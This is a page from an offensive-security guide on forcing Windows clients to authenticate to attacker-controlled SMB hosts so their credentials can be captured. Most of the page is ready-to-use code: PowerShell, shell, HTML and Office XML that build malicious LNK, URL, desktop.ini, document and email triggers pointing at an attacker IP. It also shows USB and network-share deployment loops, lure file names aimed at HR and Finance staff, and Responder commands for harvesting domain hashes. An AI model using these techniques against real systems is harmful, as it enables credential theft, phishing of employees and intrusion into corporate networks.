This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Authentication Triggers and Forcing Techniques

Understanding Authentication Triggers

Poisoning Attack Dependencies

Problem: Poisoning attacks are passive - they wait for natural authentication events that may never occur.

Solution: Active triggering - Force clients to attempt authentication to attacker-controlled services.

Attack Flow: 

Trigger Deployment → Client Interaction → Authentication Attempt → Poisoning Response → Credential Capture

Requirements: Method to deliver triggers, user interaction or automated system behavior

Attack Value: Guaranteed authentication attempts instead of waiting for natural failures

File-Based Authentication Triggers

Malicious .LNK Files (Windows Shortcuts)

Purpose: Create Windows shortcut files that automatically attempt network authentication when accessed.

Requirements: File deployment method (email, file shares, USB), Windows file explorer access

Attack Value: Automatic authentication on file access, works with file previews

Basic LNK File Creation

# Create malicious LNK using PowerShell
powershell -c "
\$WshShell = New-Object -comObject WScript.Shell
\$Shortcut = \$WshShell.CreateShortcut('\\\\<attacker-ip>\\share\\file.lnk')
\$Shortcut.TargetPath = '\\\\<attacker-ip>\\share\\target.exe'
\$Shortcut.IconLocation = '\\\\<attacker-ip>\\share\\icon.ico,0'
\$Shortcut.Save()
"

# Create LNK with embedded UNC path
powershell -c "
\$objShell = New-Object -ComObject WScript.Shell
\$lnk = \$objShell.CreateShortcut('Document.lnk')
\$lnk.TargetPath = '\\\\<attacker-ip>\\share\\document.docx'
\$lnk.Save()
"

Advanced LNK File Techniques

# LNK with legitimate-looking target but malicious icon
powershell -c "
\$WshShell = New-Object -comObject WScript.Shell
\$Shortcut = \$WshShell.CreateShortcut('Important_Document.lnk')
\$Shortcut.TargetPath = 'C:\\Windows\\System32\\notepad.exe'
\$Shortcut.IconLocation = '\\\\<attacker-ip>\\share\\document.ico,0'
\$Shortcut.Arguments = 'C:\\Windows\\System32\\drivers\\etc\\hosts'
\$Shortcut.Save()
"

# LNK targeting network printers (common in corporate environments)
powershell -c "
\$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut('Printer.lnk')
\$lnk.TargetPath = '\\\\<attacker-ip>\\print\$\\HP_LaserJet'
\$lnk.Save()
"

Malicious .URL Files (Internet Shortcuts)

Purpose: Internet shortcut files that trigger authentication when accessed or previewed.

Requirements: File deployment method, Windows Explorer or web browser access

Attack Value: Triggers authentication on file preview, works in email attachments

Basic URL File Creation

# Create malicious URL file
cat > malicious.url << 'EOF'
[InternetShortcut]
URL=file://<attacker-ip>/share/document.pdf
IconFile=\\<attacker-ip>\share\icon.ico
IconIndex=0
EOF

# URL file targeting internal services
cat > internal_portal.url << 'EOF'
[InternetShortcut]
URL=file://<attacker-ip>/intranet/portal
WorkingDirectory=\\<attacker-ip>\share\
IconFile=\\<attacker-ip>\share\portal.ico
IconIndex=0
EOF

Advanced URL File Techniques

# URL file with legitimate destination but malicious icon
cat > company_portal.url << 'EOF'
[InternetShortcut]
URL=https://portal.company.com
IconFile=\\<attacker-ip>\share\company_logo.ico
IconIndex=0
HotKey=0
IDList=
EOF

# URL file targeting WebDAV
cat > webdav_trigger.url << 'EOF'
[InternetShortcut]
URL=\\<attacker-ip>\webdav\documents\report.docx
EOF

Document-Based Authentication Triggers

Microsoft Office Documents with UNC Paths

Purpose: Embed UNC paths in Office documents to trigger authentication when opened.

Requirements: Microsoft Office installation, document delivery method

Attack Value: Automatic authentication on document open, works with auto-preview

Word Document with External References

<!-- Insert into Word document XML -->
<w:fldSimple w:instr="INCLUDEPICTURE &quot;\\<attacker-ip>\share\image.png&quot; \* MERGEFORMAT">
    <w:r><w:t>Loading...</w:t></w:r>
</w:fldSimple>

<!-- Alternative: External template reference -->
<w:attachedTemplate w:val="\\<attacker-ip>\share\template.dotx"/>

Excel with External Data Connections

<!-- Excel external data connection -->
<connection>
    <name>ExternalData</name>
    <connectionString>Provider=Microsoft.ACE.OLEDB.12.0;Data Source=\\<attacker-ip>\share\data.xlsx</connectionString>
</connection>

PowerPoint with External Media

<!-- PowerPoint with external image -->
<p:pic>
    <p:blipFill>
        <a:blip r:embed="\\<attacker-ip>\share\slide_image.png"/>
    </p:blipFill>
</p:pic>

PDF Files with SMB References

Purpose: Create PDF files that reference SMB shares to trigger authentication.

// JavaScript in PDF to trigger SMB authentication
this.exportDataObject({
    cName: "malicious",
    nLaunch: 2,
    cDIPath: "\\\\<attacker-ip>\\share\\file.txt"
});

Web-Based Authentication Triggers

HTML Files with UNC References

Purpose: HTML files that automatically attempt SMB authentication when opened in browsers.

Requirements: Web browser that supports file:// protocol, file delivery method

Attack Value: Immediate authentication attempt on file open

Basic HTML Authentication Triggers

<!-- HTML with IMG tag UNC reference -->
<!DOCTYPE html>
<html>
<head><title>Company Document</title></head>
<body>
    <h1>Important Company Information</h1>
    <img src="file://<attacker-ip>/share/logo.png" width="1" height="1">
    <p>Loading content...</p>
</body>
</html>

<!-- HTML with multiple trigger methods -->
<!DOCTYPE html>
<html>
<head>
    <title>Document Viewer</title>
    <link rel="icon" href="file://<attacker-ip>/share/favicon.ico">
</head>
<body>
    <iframe src="file://<attacker-ip>/share/content.html" width="1" height="1"></iframe>
    <object data="file://<attacker-ip>/share/document.pdf" width="1" height="1"></object>
    <embed src="file://<attacker-ip>/share/media.wmv" width="1" height="1">
</body>
</html>

Advanced HTML Techniques

<!-- HTML with CSS background image -->
<!DOCTYPE html>
<html>
<head>
    <style>
        body { background-image: url('file://<attacker-ip>/share/bg.png'); }
        .hidden { background: url('\\<attacker-ip>\share\pixel.gif'); }
    </style>
</head>
<body>
    <div class="hidden"></div>
    <h1>Company Portal</h1>
</body>
</html>

<!-- HTML with JavaScript trigger -->
<script>
    var img = new Image();
    img.src = "file://<attacker-ip>/share/track.gif";
</script>

Email-Based Authentication Triggers

Malicious Email Attachments

Purpose: Deliver authentication triggers via email attachments or embedded content.

Requirements: Email delivery capability, target email addresses

Attack Value: Wide distribution, social engineering potential

Email with Embedded UNC Paths

<!-- HTML email with hidden authentication triggers -->
<html>
<body>
    <h2>Important Company Announcement</h2>
    <p>Please review the attached document.</p>
    
    <!-- Hidden authentication triggers -->
    <img src="file://<attacker-ip>/share/pixel.gif" width="1" height="1" style="display:none;">
    <div style="background:url('\\<attacker-ip>\share\bg.png');width:1px;height:1px;"></div>
    
    <p>Best regards,<br>IT Department</p>
</body>
</html>

Outlook Signature Exploitation

<!-- Malicious Outlook signature -->
<div>
    <p>John Smith<br>
    IT Administrator<br>
    Company Inc.</p>
    <img src="\\<attacker-ip>\share\company_logo.png" width="100" height="50">
</div>

System-Level Authentication Triggers

Windows Search Indexing Triggers

Purpose: Create files that trigger authentication during Windows Search indexing.

# Create searchable document with UNC reference
cat > search_trigger.txt << 'EOF'
Company Confidential Document
For more information, see: \\<attacker-ip>\share\details.txt
EOF

# Place in commonly indexed locations
cp search_trigger.txt ~/Desktop/
cp search_trigger.txt ~/Documents/

Desktop.ini File Manipulation

Purpose: Modify desktop.ini files to trigger authentication when folders are accessed.

# Malicious desktop.ini
cat > desktop.ini << 'EOF'
[.ShellClassInfo]
IconResource=\\<attacker-ip>\share\folder.ico,0
InfoTip=Company shared folder
EOF

# Make hidden and system file
attrib +h +s desktop.ini

Automated Trigger Deployment

USB-Based Trigger Deployment

Purpose: Deploy multiple authentication triggers via USB autorun or social engineering.

# Create USB payload structure
mkdir usb_payload
cd usb_payload

# Multiple trigger files
echo '[InternetShortcut]' > important_doc.url
echo 'URL=file://<attacker-ip>/share/document.pdf' >> important_doc.url

# LNK file
powershell -c "(New-Object -ComObject WScript.Shell).CreateShortcut('$(pwd)/salary_info.lnk').TargetPath='\\<attacker-ip>\share\salary.xlsx'; (New-Object -ComObject WScript.Shell).CreateShortcut('$(pwd)/salary_info.lnk').Save()"

# HTML trigger
cat > company_portal.html << 'EOF'
<!DOCTYPE html><html><body>
<img src="file://<attacker-ip>/share/logo.png" width="1" height="1">
<h1>Redirecting to company portal...</h1>
</body></html>
EOF

Network Share Trigger Deployment

Purpose: Place trigger files on accessible network shares for widespread distribution.

# Deploy to common share locations
smbclient //<file-server>/public -U <username> -c "put malicious.lnk"
smbclient //<file-server>/shared -U <username> -c "put trigger.url"

# Target user home directories
for user in $(cat users.txt); do
    smbclient //<file-server>/$user -U <username> -c "put personal_doc.lnk Desktop/"
done

Trigger Optimization and Evasion

Legitimate-Looking Triggers

# Use company-specific naming
Company_Salary_Report_2024.lnk
IT_Security_Update.url
Emergency_Contact_List.html

# Target department-specific interests
HR_Benefits_Package.lnk          # Target HR department
Financial_Q4_Results.url         # Target Finance
IT_Equipment_Inventory.html      # Target IT staff

Multiple Trigger Deployment

# Deploy various trigger types simultaneously
# Email campaign with HTML triggers
# USB drops with LNK files  
# Network share population with URL files
# Document templates with UNC references

# Monitor for authentication attempts
sudo responder -I eth0 -wrf -v | grep -E "(COMPANY\\|company\.com)"

Integrated Poisoning + Trigger Workflow

Comprehensive Attack Campaign

# Phase 1: Setup poisoning infrastructure
sudo responder -I eth0 -wrf -v

# Phase 2: Deploy authentication triggers
# Create and distribute malicious files
powershell -c "(New-Object -ComObject WScript.Shell).CreateShortcut('Q4_Budget.lnk').TargetPath='\\<attacker-ip>\share\budget.xlsx'"

# Phase 3: Monitor for triggered authentication
tail -f /usr/share/responder/logs/*.txt | grep -E "triggered|forced"

# Phase 4: Process captured domain credentials
grep -E "DOMAIN\\\\" /usr/share/responder/logs/*.txt > triggered_creds.txt

Trigger Success Indicators

  • Immediate Authentication: Triggers work within minutes/hours vs. days for passive poisoning

  • High Volume: Multiple authentication attempts from single trigger deployment

  • Predictable Timing: Authentication correlates with trigger deployment timing

  • Targeted Success: Higher rate of administrative/service account capture

Authentication triggers transform passive poisoning into active credential harvesting, dramatically increasing success rates and reducing time-to-compromise in AD environments.

PreviousPoisoning AttacksNextLateral Movement

Last updated

Was this helpful?